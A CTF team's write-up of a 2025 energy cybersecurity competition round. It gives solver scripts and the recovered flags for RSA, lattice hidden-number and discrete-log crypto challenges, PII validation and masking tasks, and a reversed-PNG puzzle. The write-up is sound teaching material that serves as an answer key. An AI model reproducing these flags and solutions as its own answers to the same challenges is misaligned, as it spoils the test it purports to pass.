2025 Energy Cybersecurity Competition, Team Preliminary Round, Public Group: Write-up

admin, 23 April 2025 17:56:52
Building the cybersecurity defence line together, safeguarding energy security together

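On 17 April, the team preliminary round of the 2025 Energy Cybersecurity Competition came to a successful close. As an annual highlight of the cybersecurity field, the competition attracted many technical experts, and its challenges covered several key areas, from cryptography and data security to web security. The two teams entered by the Hillstone Networks (山石网科) Security Technology Research Institute, relying on solid technical skills and sharp problem-solving, cracked a number of high-difficulty challenges and became the participating organization with the most solves in the Public Group. Today we present a detailed analysis of the challenges and share our approach and the technical details, in the hope that it helps.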

I. Crypto

(1) NumberTheory

Challenge source:
```python
from Crypto.Util.number import *
import hint

flag = b'xxx'
e = 65537
p = getPrime(512)
q = getPrime(512)
n = p * q
m = bytes_to_long(flag)
c = pow(m, e, n)
k = getPrime(1024)
assert hint + 233 * k == 233 * k * p
print(n)
print(c)
print(hint)
# 84099006955126261966925371456202769943592466221370095794235167154956697927281125181449320270460637820908574232493978429962263974458426503598700104493216727535451616752760724333653967152401716945549285008242019874215196489846481143398374860288545040874468108191037481101604627874268575884573685952474988256841
# 28098063654079651384124474197746356824080585622155888018279898490747561415908220072536298610509681898119018709183606442183944207485940115624047842734359988590155403601250406116023121958193303908964857108526965815235457652033182982467968474248778435731228104089366239566977364311197776651102290796373095167764
# 411245630228311610573345621334618725748702407327926883063919892785851166202383809662483938501531987094884084543300939673794551515912845363503988032311234800260819110323258416786417746444373651130257247926678135654564298408894174083333804257126735899220917359603430399033328133462456659839525671074605146583034398735379485362144932899212206419889556154825755723979850750847762362288223441051219637465296077020565435562941976546609555729574021362954126496825972439730
```
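Analysing the source, it is easy to see that the key is the assert statement, which can be rearranged so that hint is expressed through k and p.
By Fermat's little theorem, for any integer coprime to the prime p, a fixed power of that integer is congruent to 1 modulo p.
The same holds when the exponent is an integer multiple of that power's exponent, and hint is such a multiple.
Therefore the base raised to hint is congruent to 1 modulo p, so that power minus 1 is a multiple of p. Computing its gcd with n, as the exp does with gcd(pow(a, hint, n)-1, n), yields p, after which the RSA ciphertext is decrypted as usual.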
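The derivation these steps rely on, written out as an added note reconstructed from the assert in the challenge source and the gcd line of the exp (a is the base that the exp fixes to 2; the formulas are not copied from the original page):

$$
\text{hint} + 233k = 233kp \iff \text{hint} = 233\,k\,(p-1)
$$

$$
\gcd(a,p)=1 \implies a^{p-1}\equiv 1 \pmod p \implies a^{\text{hint}} = \left(a^{p-1}\right)^{233k} \equiv 1 \pmod p
$$

$$
p \mid a^{\text{hint}}-1 \ \text{ and } \ p \mid n \implies p \mid \gcd\!\left(\left(a^{\text{hint}} \bmod n\right)-1,\; n\right)
$$

The gcd is exactly $p$ unless $a^{\text{hint}} \equiv 1 \pmod q$ holds as well, in which case it would be $n$ and another base $a$ would have to be tried.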
Solution exp:
```python
from Cryptodome.Util.number import long_to_bytes
from gmpy2 import gcd, invert

e = 65537
n = 84099006955126261966925371456202769943592466221370095794235167154956697927281125181449320270460637820908574232493978429962263974458426503598700104493216727535451616752760724333653967152401716945549285008242019874215196489846481143398374860288545040874468108191037481101604627874268575884573685952474988256841
c = 28098063654079651384124474197746356824080585622155888018279898490747561415908220072536298610509681898119018709183606442183944207485940115624047842734359988590155403601250406116023121958193303908964857108526965815235457652033182982467968474248778435731228104089366239566977364311197776651102290796373095167764
hint = 411245630228311610573345621334618725748702407327926883063919892785851166202383809662483938501531987094884084543300939673794551515912845363503988032311234800260819110323258416786417746444373651130257247926678135654564298408894174083333804257126735899220917359603430399033328133462456659839525671074605146583034398735379485362144932899212206419889556154825755723979850750847762362288223441051219637465296077020565435562941976546609555729574021362954126496825972439730

a = 2
# hint is a multiple of p - 1, so a^hint - 1 is a multiple of p
p = gcd(pow(a, hint, n) - 1, n)
q = n // p
phi = (p - 1) * (q - 1)
d = invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
# b'flag{a3878d9436b7c80e6ecfda33b7b0b840}'
```
(2) easy_lwe

Challenge source:
```python
from Crypto.Util.number import *
from secrets import flag

assert len(flag) == 38
p = getPrime(512)
m = getPrime(512)
while m > p:
    m = getPrime(512)
aa = []
cc = []
bb = []
for i in range(30):
    a = getPrime(512)
    b = getPrime(400)
    c = (a * m + b) % p
    aa.append(a)
    cc.append(c)
    bb.append(b)
enc = pow(m,flag,p)   # the flag is the exponent; the solver decodes it with long_to_bytes
print(f'p = {p}')
print(f'aa = {aa}')
print(f'cc = {cc}')
print(f'enc = {enc}')
# Output: p, aa, cc and enc. The same values are hard-coded in the solving
# script in the HNP section, where aa and cc are named rs and cs.
```
This challenge splits into two parts: an HNP problem first and a DLP problem second. We analyse them in turn.
HNP

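HNP stands for the Hidden Number Problem. The variant in this challenge is LHNP, the linear hidden number problem. It is defined as recovering the hidden number from a system of equations of the form produced by the challenge source, `c = (a * m + b) % p`.

Each single equation can be rewritten, and from the rewritten equations we can construct a matrix (built as `M` in the script below).

In that matrix, `K` is the upper bound of the noise `b`, used as a constant coefficient. Running the LLL algorithm yields the target vector, from which the hidden number is recovered.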
```python
# SageMath script: recover the hidden number m (called x here) with LLL
from Crypto.Util.number import *

p = 0x83b05d231fd40ff8ca26b4fb8136dc920754c14412960ce2ec700457861d48fe74f3958fc3a153f77a23fb850ecf0ac1e9722c71b6cc8a104b372cc17bf1528f
rs = [
    0xf53f440f2e76b60380e68e96508f5dd716b2c3df2ed8265ced83a93fd61a708eeff31fbee9efa22fa7b441cbc406c210de6273f81eb7d093561d5c6394ef2abd,
    0xe9ecbd5457dcf1bdbc1a852b625c7a8ae6f530e348c2dc0416afd6a375aeb06d4800cc6471ae7d29681715d0407aa8726c32cd35e54960f56b0d9b47a2eed9ed,
    0x86a261c1590a774ced6c7db439e53e4068a8dbc0ad111a0e0371e8731fb939a068348d035da04afb9a3914a011574e35cefc4d5c5740f7cbc27459d944f51d15,
    0xba99a871d8f805e3c0dcd4e04cee66ec5e213a7902a65f2faa8e86368e56c42d09fde536b07471fff8f72db922725a24d6288d1bfe9edc2cd76b756eb464e1eb,
    0xa99efeb79377db6baa8787b5d2d2ebf123d8ec77e820d1b88644883a07c38498aa08df82cb9802c7fa128a5fa08b66c56a0805f70a78b7cb45b1a74bde095165,
    0xe6341800304b0a6f2de941432bb253f53a3c73c7b0f0382fd1ec4c882da5fd1b5151c619f9279de3767ae03af387c495c50c8c0ff79fd6c8acb51bd0b16afc23,
    0xa8670f7142e5d90e781e335d5e870188b94288defd8302c1b183bf20b5a3720be1ae1afe0ad937bc4678727e1daf262194c430086f3810447dfce721c8fb36a5,
    0xe9d150d4e7a7f82e89d26fcaa003579c8dfc25f4a50794175ae0a4407dd33e87eb5fded328155009548c002d2a3198afa356e1692a6bb820d8ae71ca6e506b35,
    0xd7ec72dd643449f5d21a32a11e2458d292c524b91b4b1a8515a5f8351717813f51a55c5675aa0eaa5c80a32d26aa385d7425e7d3e1e50936b2744a1534e3c7b7,
    0xaf5d8062f6bc03875b5fb10d0888d586cb08fa62709910cd7d931201d4d833d31d935003b801cac4fd51ef1e4db3bc13e41d740d7881560c0942faf9acca55d5,
    0xf63c4a5add0474bf6c4fb6617a2965e2474a2902c59bcc4243d5dcffa0f1aa0a6136e9c9093ea05d84a26888aaad63ec652602200141abdfcdc0d1912d208dbb,
    0xd65c8ef9b01085819f2f5f2dfbb7641521966600ddd7a03b886320328144ec42ed5585206744c8e1b5beb5502aff6f0cd01934890926bbb5387363b321dbb6bd,
    0x9bd7a0e9d4940126c9668de7e29e198ac38010d505b90e92ee560307b8a134545bbd0277f14e7651e91c5a9362207097e17888b9a49a889c672f76681f41962f,
    0xff387c4e94f47cba242936e80d620d3eeb203a1c7f365ae178b33b29ff3d8c2f932733d0605876c23942bae7f096b3ee457d02758796bda01bbcd3bd2e1229a1,
    0xbd6c24205cf5b9b2acc909296369ca77ef34ceac5f9900742a7ec37c00b94a56418d168d576d33383d9f782386524c4cecebc3a9fa68c81a5a6867de564d07e3,
    0x8850ac2051b6a7450f228e676abbfd510ce08a43a0b791182aedcfb6b3f1d478e3dc953e59eb99fe370f71d52af3a1625e0700078927f8a5919becbfa60af96b,
    0xfa474444b5372681c5b7316871cf9a93306b4d6a3eac2492c71780eb6903bd4ff77b1c4a28608dfa10c0c8b8bfc23942fc0a8ec64d3967504621e692eafcf4af,
    0xfd7f772c719929d33f15ce0122f6efc278b728d75dbd16a343c649e49118a79084d169d6db1b6b859e1f4c82694a850622dcdff23c8fbd7d0a736a409b94f471,
    0xedf6566ecd7f0a0beaa2f45a2a509358c9537dbf772e6f63ccb0e21b5c5c3dae0939e9e15c9bcdf80f7875e74ebfba16f0660737719c8ad435981b5b8df89a23,
    0xd7e718dafb753084cb7c1deee139f6e158a0228bbf9b0ae5ed3a8b3d2508ce62e4e32cd43a3135540b31e052e6e3a0dba3ae623c69d74da34387c3429b6f0487,
    0xbff5ab718c54909a34ba8ab5787cbfb0c9c57394350b71744d5751f577cefda87cc8263b21dd2c21a8f19fff8362c3371fcb054dddb1293df7d6efe2d661e4ab,
    0xb946ad47cf1f9186c1eeaeed12f21b41a29f9fb74b14f577c97731004b372c5f41023aafc9b93557c984ff87dd263b293aa500c3a2ce1f0815319263cf7c42d5,
    0x9b93853dc5f4c052fdda339f69c625bc98ffdbde439078458b84278e34542f9110863e5beef166a766f565f7a815ec4a462510b42f81454b65e648622c610b27,
    0xae050aaa86b9580747efa33561973597d7d7a0684a45219eed3224ebc37fdf067ed61a29ecaa501266c9bcdd16b850c0dd40da3f964a5b03ae60c3967fd55913,
    0xea57b0482a876d49a3e21bb885bda0aae21f5fcf2521f7e1db771998b6b639d0833c17d7c8c67c12ce9b60e4210e068f98344a8cabc5faa17a048100bab797bb,
    0x9f866ad27c9ea2fb29168ec6db0f7755221484d0c89bfef0cd70fc2ed14fda15f7b59bbca2e23f40b5effeb9e53ad821e06cf986b34da4407c85bfbf78d2920b,
    0xab0939605dcff5d1ec8405b6daeb65eccc6e3b5956601dddea95c6310ac32bfeec1bab6b83e85371078a16ea9489050175098d39488aaed2a190c647fe2b1b69,
    0xe85698e04d8bedbac2c7884c914b7026dbb1dd5134c4a5a8e7541b07c8a94ab3d2f12eb7f1171ccd564054e1dc63d5ac044e5c5552870b419fef35a572199239,
    0xea94663e103e4354fb7feb80b11d06c7e16feb7265f69ee882180baba70fa075df24e3fe1ad12a99f054cabf4a3f5e4823416d4c4daa02ca51ce3926034186db,
    0x93662718294005f4ac8f79b0799e240a05eea871ef07d623ea7c68ef818b3b55fb4f9b6f06c399726e59cec03389053b448f187404cddb93cb3c55e3d12cebc9,
]
cs = [
    0x4aae29aaaab89fbc672db400c41d1ad3ffce937e7810065bed552c12101fb778046d22b00c05bbc3f61825b5af3c3e57f1abaafe3d9a58a573a905e2a1cecde7,
    0x502a1c23ef44f174aaedb9a49705eb72f805bab13e82d599525ea7484cc11f2e7c4475526b4be344390e46bcb8bcdaba2768c6321f8ca5482666171eee498f28,
    0x546f2276b59b7186ef5b9a04e0ba2691648d005fc780303411a1082ea3b05be127a10e26921a4b84b14d8acc45a6c32a0142ac6eb396415ecb5841a01b775b5d,
    0x43986eb7208b66dd86c12f953e10b2d3907873151170278393b6a4f7ea518ab5745e2db5f4dbec84087c4817c5df10e743f35ed1190515aba34832b1b274bf2e,
    0x7b2e448342bc7409ed891cdbf5137014f417866097297302085d8800458495e374fba8398d069f1c1c7792a9f03194e36921c378308de18313fb9b62db45cc0a,
    0x41ac8f265bc96ae868256fb08caf0a43a547346522b5d90cb9489c87cd5d726447d20354332dd3cb771003eddfa9c4bfa6923ae45ac8c0994f7cce46a3302eea,
    0x51b59ad39b388fdb2056279e2de02d32d36b52da1cc1fe4f6843964273b4585704e21405e2528e5894bd4fdb436c382a5f7d3849f9c5d7902be74edd2b16a31c,
    0x4e52d207f16a6f42497b25600e039de3ce49d7945ac2201ac12bf9fa9b3dc136f35328cbe9d3f9d4204d90f29fe1ce209c8904c99de0f85c5c572d05609095a6,
    0x6485f505cd8296e9f1c9abdc39eebc6e767e98e1587b18878fa8a582a012bb609c2f36daffc2b9c460514bc47533525ce6835e7f8123331a833958fa47f2e40,
    0x1ff809e71ab0347a8a9ec4356d5b8fbf109ade5881e5b59ac14adaaef2034fc40880e495070442513f42434fa8cbfcd9bce0501574997b35939f201ba1c87872,
    0x5b3fad73b402fcc1148758d80a61f637257d35f2773c8dc9f22859a01aecaa37a37858232ab5b3e3622f234bf35bb02a6e93ecd5a06182b61e583d0193afaf55,
    0x640e3556a526209f8528fbe678da3914d912a7e701abc3d4fcd65d84bcdbfc22623dfa3db31f9585a615c6de869b39c040dbfe94bb7eafd91bde15c4b87bd2c0,
    0x335b0ff42f39541539752faade7510a301a861720d85958ce2890ddca9e0693b342604a5b134a0974ea21dc0dc0a156c01159898e5f87e16b4a56121c2e3bbb5,
    0x89621740ec8b81065457105685666dfe6e31ee4f0a6efa6901e20ad6e5ea19ba438ea92f632764e52ccfb1ed35639443b5536f19ca69e9c295c6f5287a5e31b,
    0x1e4162060327045be0f5a0ae5d7b87c60b928e4669450339af64a39ae45b108eb58bbe83e15bef7a5c92243b213adc3e9d3514632249314bf5b588df6202ae10,
    0x5d10e308a16f8cd5c53b3ecd1081624e6eed4c3bfe522a8b7daf301aa6fc370b0a1cff1db7ea27aa6f5200903b365c53bc6d890ca1167ca57de87f80c5321742,
    0x434ac82b1ed073a1d73606ffe973e316768368fb522644f6cc76d2a0e6b83f533524c7589113aeb2db35d50c2f9ff64ceb27958a93d47b6875b8eb9b158ebaac,
    0x7cf3028273ece2a8af9790d3a689875bf7a3894e351a639d88fa13de05dc7f18be20ddeef4414a31b0f3dd65291e5d4d47d098027dbec25d4bc5409c017f0b03,
    0x5d0eefe7de32360d7950d96d821ce06741b737a1dca016cb003f75e380f5c8e3d9b8505b0eda21b36879a6455d1f640bdac5ad648b97d80eacf406b57bb1d692,
    0x4e4c6156da7f71123e1b4efde4a436985c6f2cccdc9b182735a75153927c6e7dc94693ab7fdd8646821a9d42eeb76c1be54984f81296a10e689805975185bf2c,
    0x68db6b837d968569ba944591efb36587f0022b05cefbedaad1e1d7652d0c233d1c0b036364f25e0865c7a1dab8d9d1081f23928a3573b5ec711e5b7f32714a4,
    0x333db46bc5fb83cbbf68475fd612bcad6becd30f95bf5b9ab6058ed0777fcb78cfe6da5c3386799fe9a1d6616801154ae7f45e35612de08efed7e2e750088b8e,
    0x70d4dc8986c228e12329af934c08f7c0ca94ce6913b5c641c59b3cf629a1957f82d4f40aaa7faa765c75e4f994a8222a4d08e045fb529da5ee277e1b9540c148,
    0x20421569b3bc73da4505760f7798a504f2276e6df9c9e48320b23201fb682021d168f6ee657fc2080722eb576ac78bf4b63ad7419983a05196fa0724fc4886d,
    0x5f523df584f43d7eff229d562793c8e5d4713d9c80bd40b95434c34c982324f7c282ac2fe3ac151cb62435b85bece2ef115c6f4b7a33d47dcbfa8360f89b91ac,
    0x7cbedea149640064a93cb75b909804ee7a896e17da808579206d1db7523b98bdf15bdc70e267e0a201bf293f980c1b5304337a7a78cc655aca07b9818b7169ab,
    0x62b34eaac3d3a2b360805cc23147ff8754a9d90788461107a5c8cc7053a0910ca7af45035d333c9a0b7cf6a2c13c9c367ad8eea0ccda2a6d8e089b5ee07a76ef,
    0x3e1c31f988e238869fad4794beb32164fa3bf3880041d1f9f2a65e2679f951491fcbeff1aa067313bf02100ae15d1af4d87050db05cec934e077c3eec238b72,
    0x3c056ad33432e1cf5548ae3a6db21ee1471eb70619e0ad542bd38dd80f37b76b571ae6469bacd33f9618b7a61b8e8424fc33cae479375df72b064a5d1b8cd90f,
    0x4caf081f5b949e65115e18b613ad8dc1fc208d2c5bea710b27b1db11d4a7eecc455c13f2fd92481f8cfea3e6fa75c0a58a154f12b6ce92c66107f617fd7ed7d8,
]
enc = 0x191eb43459bd0f2d5ece00ab52c612668bb4c161014641a6e4afb41020465d7b82e9b60a55ab831bb5695f2fd832d08258c752ebf27ba0374b7b11b001b2629a

t = len(rs)
kbits = 400                # bit length of the noise b
K = 2 ** kbits             # upper bound of the noise
P = identity_matrix(t) * p
RC = matrix([[-1, 0], [0, 1]]) * matrix([rs, cs])
KP = matrix([[K / p, 0], [0, K]])
M = block_matrix([[P, 0], [RC, KP]], subdivide=False)
shortest_vector = M.LLL()
# row 1 of the reduced basis, second-to-last column, carries x * K / p
x = shortest_vector[1, -2] / K * p % p
print(x)
# x=6789891305297779556556571922812978922375073901749764215969003309869718878076269545304055843125301553103531252334876560433405451108895206969904268456786139
```
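The same lattice on a toy instance, as an added example that is not code from the original write-up: it builds the basis used in the Sage script above for constructed small parameters and reduces it with a textbook LLL written in pure Python, so it runs without SageMath. The names `lll`, `recover_hidden_number` and `make_instance`, and the sample values (p = 2^61 - 1, 32-bit noise, 5 samples), are assumptions made for this illustration.

```python
from fractions import Fraction
import random


def dot(u, v):
    return sum(x * y for x, y in zip(u, v))


def gram_schmidt(basis):
    """Return the orthogonalised vectors b*_i and the coefficients mu[i][j]."""
    n = len(basis)
    ortho, mu = [], [[Fraction(0)] * n for _ in range(n)]
    for i in range(n):
        v = list(basis[i])
        for j in range(i):
            mu[i][j] = dot(basis[i], ortho[j]) / dot(ortho[j], ortho[j])
            v = [x - mu[i][j] * y for x, y in zip(v, ortho[j])]
        ortho.append(v)
    return ortho, mu


def lll(basis, delta=Fraction(3, 4)):
    """Textbook LLL over exact rationals (slow, but fine for tiny lattices)."""
    basis = [[Fraction(x) for x in row] for row in basis]
    n = len(basis)
    ortho, mu = gram_schmidt(basis)
    k = 1
    while k < n:
        for j in range(k - 1, -1, -1):              # size-reduce row k
            q = round(mu[k][j])
            if q:
                basis[k] = [x - q * y for x, y in zip(basis[k], basis[j])]
                for l in range(j):
                    mu[k][l] -= q * mu[j][l]
                mu[k][j] -= q
        lhs = dot(ortho[k], ortho[k])
        rhs = (delta - mu[k][k - 1] ** 2) * dot(ortho[k - 1], ortho[k - 1])
        if lhs >= rhs:                              # Lovasz condition holds
            k += 1
        else:
            basis[k], basis[k - 1] = basis[k - 1], basis[k]
            ortho, mu = gram_schmidt(basis)
            k = max(k - 1, 1)
    return basis


def recover_hidden_number(p, a_list, c_list, noise_bits):
    """Recover m from samples c = (a*m + b) % p with 0 <= b < 2**noise_bits."""
    t = len(a_list)
    K = 2 ** noise_bits
    # Same layout as M in the Sage script: p*I on top, then (-a | K/p, 0)
    # and (c | 0, K). The lattice contains (b_1..b_t, m*K/p, K), which is short.
    rows = [[p if i == j else 0 for j in range(t)] + [0, 0] for i in range(t)]
    rows.append([-a for a in a_list] + [Fraction(K, p), 0])
    rows.append(list(c_list) + [0, K])
    for row in lll(rows):
        if abs(row[-1]) != K:                       # not the (+/-) target vector
            continue
        sign = 1 if row[-1] > 0 else -1
        candidate = int(sign * row[-2] * p / K) % p
        # Accept only if every residual is small, i.e. the noise bound holds.
        if all((c - a * candidate) % p < K for a, c in zip(a_list, c_list)):
            return candidate
    return None


def make_instance(seed=2025, samples=5, noise_bits=32):
    """Constructed sample data in the shape of the challenge."""
    rng = random.Random(seed)
    p = 2 ** 61 - 1                                 # a Mersenne prime
    m = rng.randrange(1, p)
    a_list = [rng.randrange(1, p) for _ in range(samples)]
    c_list = [(a * m + rng.getrandbits(noise_bits)) % p for a in a_list]
    return p, m, a_list, c_list


if __name__ == "__main__":
    p, m, a_list, c_list = make_instance()
    print("recovered:", recover_hidden_number(p, a_list, c_list, 32) == m)
```

The recovery works because the noise is far smaller than the modulus (32 of 61 bits here, 400 of 512 bits in the challenge) and several samples share one secret; with noise close to the size of p the target vector is no longer unusually short.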
DLP
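DLP (the discrete logarithm problem) can be solved with many algorithms. For this challenge, checking p - 1 shows that it has many small factors, so we can treat it as smooth and the Pohlig-Hellman algorithm applies; for the last, large prime factor of p - 1 we brute-force the last few bits.
```python
# Continues the HNP script above in the same Sage session (uses p, enc and the recovered x).
G = GF(p)
factors, exps = zip(*factor(p - 1))
# prime-power factors of p - 1 (^ is exponentiation in Sage)
primes = [factors[i] ^ exps[i] for i in range(len(factors))]
print(primes)
dlogs = []
for fac in primes[:-1]:
    # project into the subgroup of order fac and solve the small DLP there
    t = (p - 1) // fac
    dlog = discrete_log(G(pow(enc, t, p)), G(pow(x, t, p)))
    dlogs += [dlog]
s = (p - 1) // primes[-1]
print(s)
res = crt(dlogs, primes[:-1])
# the exponent is known modulo s; brute-force the remaining multiple of s
for i in range(100):
    if b'flag{' in long_to_bytes(res + i * s):
        print(long_to_bytes(res + i * s))
        break
```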
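What `discrete_log` plus `crt` do in the snippet above, spelled out in plain Python as an added example (not code from the original write-up). It goes slightly beyond the text by constructing its own small group at run time: a prime p with p - 1 = smooth part times one large prime r. The names `build_group`, `dlog_mod_smooth`, `recover_exponent` and all numbers are assumptions made for this illustration.

```python
import random

SMALL_FACTORS = {2: 4, 3: 2, 5: 1, 7: 1, 11: 1, 13: 1}   # constructed smooth part


def is_prime(n):
    """Trial division; enough for the roughly 40-bit numbers used here."""
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    i = 3
    while i * i <= n:
        if n % i == 0:
            return False
        i += 2
    return True


def build_group(start=1_000_003):
    """Find a prime p with p - 1 = smooth * r (r a large prime) and a primitive root g."""
    smooth = 1
    for q, e in SMALL_FACTORS.items():
        smooth *= q ** e
    r = start
    while not (is_prime(r) and is_prime(smooth * r + 1)):
        r += 2
    p = smooth * r + 1
    g = 2
    while any(pow(g, (p - 1) // q, p) == 1 for q in list(SMALL_FACTORS) + [r]):
        g += 1                                   # g must have full order p - 1
    return p, g, smooth, r


def dlog_mod_smooth(g, h, p):
    """Pohlig-Hellman: return (x mod s, s), s being the smooth part of p - 1."""
    residues, moduli = [], []
    for q, e in SMALL_FACTORS.items():
        fac = q ** e
        t = (p - 1) // fac
        g_t, h_t = pow(g, t, p), pow(h, t, p)    # project into the subgroup of order fac
        acc, x = 1, 0
        while acc != h_t:                        # the subgroup is tiny: exhaustive search
            acc, x = acc * g_t % p, x + 1
        residues.append(x)
        moduli.append(fac)
    res, s = 0, 1
    for r_i, m_i in zip(residues, moduli):       # incremental CRT
        k = (r_i - res) * pow(s, -1, m_i) % m_i
        res, s = res + s * k, s * m_i
    return res, s


def recover_exponent(g, h, p, tries=100):
    """Finish as the write-up does: brute-force the multiple of s that is left."""
    res, s = dlog_mod_smooth(g, h, p)
    for i in range(tries):
        if pow(g, res + i * s, p) == h:
            return res + i * s
    return None                                  # exponent too large for the brute force


def demo(seed=2025):
    p, g, smooth, _ = build_group()
    secret = random.Random(seed).randrange(1, 100 * smooth)
    return secret, recover_exponent(g, pow(g, secret, p), p)


if __name__ == "__main__":
    secret, found = demo()
    print("recovered:", found == secret)
```

The part of the exponent that falls to this method is bounded by the smooth part of the group order; the rest is protected only by the large prime factor, which is why an exponent (the flag) shorter than roughly 100 times the smooth part is fully recoverable here.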
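II. Data Security
(1) Structured data identification

Use AI to generate a validation function for each field type, then go through every row and keep the rows that satisfy all 4 conditions at once; the final result is MD5-hashed.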
```python
import re
from datetime import datetime
import hashlib
import pandas as pd


def is_sfz(id_number):
    """Validate an 18-character resident ID card number."""
    if not isinstance(id_number, str) or len(id_number) != 18:
        return False
    if not re.match(r"^\d{17}[\dXx]$", id_number):
        return False
    if not id_number[:6].isdigit():
        return False
    try:
        # characters 7-14 are the birth date
        birth_date = datetime.strptime(id_number[6:14], "%Y%m%d")
        if birth_date > datetime.now():
            return False
        if birth_date.year < datetime.now().year - 150:
            return False
    except ValueError:
        return False
    # weighted checksum over the first 17 digits
    weights = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
    check_codes = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']
    total = 0
    for i in range(17):
        total += int(id_number[i]) * weights[i]
    calculated_check_code = check_codes[total % 11]
    if id_number[-1].upper() != calculated_check_code:
        return False
    return True


def is_phone_number(phone_number):
    """Validate an 11-digit mobile number starting with 1[3-9]."""
    if not isinstance(phone_number, str) or len(phone_number) != 11:
        return False
    if not phone_number.isdigit():
        return False
    if phone_number[0] != '1' or not ('3' <= phone_number[1] <= '9'):
        return False
    return True


def is_email(email):
    if not isinstance(email, str) or not email or len(email) > 254:
        return False
    # Regular expression for the basic mailbox format of RFC 5322
    pattern = r"""
        ^                           # start
        [a-zA-Z0-9]                # must start with a letter or digit
        [a-zA-Z0-9._%+-]{0,63}     # middle characters (at most 64 characters)
        @                           # the @ sign
        [a-zA-Z0-9.-]{1,63}        # domain part
        \.                          # the last dot
        [a-zA-Z]{2,}               # top-level domain (at least 2 characters)
        $                           # end
    """
    email_regex = re.compile(pattern, re.VERBOSE)
    if not email_regex.match(email):
        return False
    if ".." in email or "--" in email:
        return False
    local_part, domain = email.split('@', 1)
    if len(local_part) > 64:
        return False
    if len(domain) > 253:
        return False
    domain_parts = domain.split('.')
    for part in domain_parts:
        if not part or part.startswith('-') or part.endswith('-'):
            return False
    return True


def is_yhk(card_number):
    """Validate a bank card number (13-19 digits) with the Luhn checksum."""
    card_number = ''.join(filter(str.isdigit, str(card_number)))
    if len(card_number) < 13 or len(card_number) > 19:
        return False
    total = 0
    reverse_digits = card_number[::-1]
    for i, digit in enumerate(reverse_digits):
        num = int(digit)
        if i % 2 == 1:
            num *= 2
            if num > 9:
                num = (num // 10) + (num % 10)
        total += num
    return total % 10 == 0


def is_ok(sfz, phone, email, yhk):
    if is_sfz(sfz) and is_phone_number(phone) and is_email(email) and is_yhk(yhk):
        return True


count = 0
excel_obj = pd.read_excel("data.xlsx")
data = excel_obj.iloc[:, 0:4].values.tolist()
for one in data:
    if is_ok(one[0], one[1], one[2], one[3]):
        count += 1
print(hashlib.md5(str(count).encode('utf-8')).hexdigest())
# 082a8bbf2c357c09f26675f9cf5bcba3
```
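(2)

Data Masking

Processing rules:
  • ID number: first 6 digits + **
  • Mobile number: first 3 and last 3 digits kept, middle replaced with *
  • Email: everything before the @ replaced with *, except .
  • Bank card: first 4 and last 10 digits kept, middle replaced with *
  • Name: 2 characters: first + * / 3 characters: first and last + * / 4 characters: first and last + **
  • Gender → 未知 (unknown)
  • WeChat ID: all *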
import pandas as pd
from hashlib import md5 as hasher

PROCESSORS = [
    # Mask the ID number
    ('身份证号', lambda x: x[:6] + '*'*(len(x)-6)),
    ('Email', lambda e: ''.join('*' if c != '.' else '.' for c in e.split('@')[0]) + '@' + e.split('@')[1]),
    ('手机号', lambda p: f"{str(p)[:3]}*****{str(p)[-3:]}"),
    ('性别', lambda _: "未知"),
    ('银行卡号', lambda c: str(c)[:4] + '*'*(len(str(c))-14) + str(c)[-10:]),
    ('姓名', lambda n: (
        n[0]+'*'*(len(n)-1) if len(n)==2 else
        n[0]+'*'+n[2] if len(n)==3 else
        n[0]+'**'+n[3] if len(n)==4 else n
    )),
    ('微信号', lambda w: '*'*len(w))
]
raw_data = pd.read_excel('data.xlsx')
modified = raw_data.copy()
for column, processor in PROCESSORS:
    modified[column] = modified[column].apply(processor)
FIELD_ORDER = ['姓名', '手机号', '身份证号', '银行卡号', 'Email', '性别', '微信号']
concat_parts = []
for _, row in modified[FIELD_ORDER].iterrows():
    row_str = ''
    for field in FIELD_ORDER:
        row_str += str(row[field])
    concat_parts.append(row_str)
full_string = ''.join(concat_parts)
# Compute the MD5
digest = hasher(full_string.encode('utf-8')).hexdigest()
print(digest)
This yields the final flag: b54cc7298aaaae763d605cf87bcd714a
III. Misc
(1)

black_white

Looking at the tail of the image file, there is a second image stored in reverse byte order. Extract it, then write a script to restore it.
source_file = open("tmp.png", "rb")
try:
    image_content = source_file.read()
    # Reverse the whole byte stream to restore the image
    reversed_content = image_content[::-1]
    output_file = open("result.png", "wb")
    try:
        output_file.write(reversed_content)
    finally:
        output_file.close()
finally:
    source_file.close()
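An added example, not part of the original write-up: rather than carving tmp.png by hand, the sketch below walks the PNG chunk list to find where the cover image ends, checks whether the trailing bytes are a PNG stored back to front, and returns it restored. The function names and the two tiny sample images are constructed for illustration.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def _chunk(tag, body):
    crc = zlib.crc32(tag + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)

def make_png(width, height, gray):
    """Build a minimal 8-bit grayscale PNG (constructed sample input)."""
    rows = b"".join(b"\x00" + bytes([gray]) * width for _ in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(rows)) + _chunk(b"IEND", b""))

def png_end(data):
    """Walk the chunk list, checking every CRC; return the offset just past IEND."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos = 8
    while pos + 12 <= len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            raise ValueError("truncated chunk")
        body = data[pos + 8:end - 4]
        if zlib.crc32(tag + body) & 0xFFFFFFFF != struct.unpack(">I", data[end - 4:end])[0]:
            raise ValueError(f"bad CRC in chunk {tag!r}")
        pos = end
        if tag == b"IEND":
            return pos
    raise ValueError("no IEND chunk")

def carve_reversed_png(data):
    """Return (cover, hidden); hidden is None when no reversed PNG follows IEND."""
    end = png_end(data)
    trailer = data[end:]
    if not trailer.endswith(PNG_SIG[::-1]):
        return data[:end], None
    hidden = trailer[::-1]
    # png_end() validates the recovered image and trims anything after its IEND
    return data[:end], hidden[:png_end(hidden)]

# Constructed sample: a white 4x4 cover with a black 3x2 image appended back to front.
COVER = make_png(4, 4, 255)
HIDDEN = make_png(3, 2, 0)
SAMPLE = COVER + HIDDEN[::-1]
```

Any bytes after a valid IEND chunk are worth flagging on their own; the reversed-signature test only identifies this particular hiding method.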
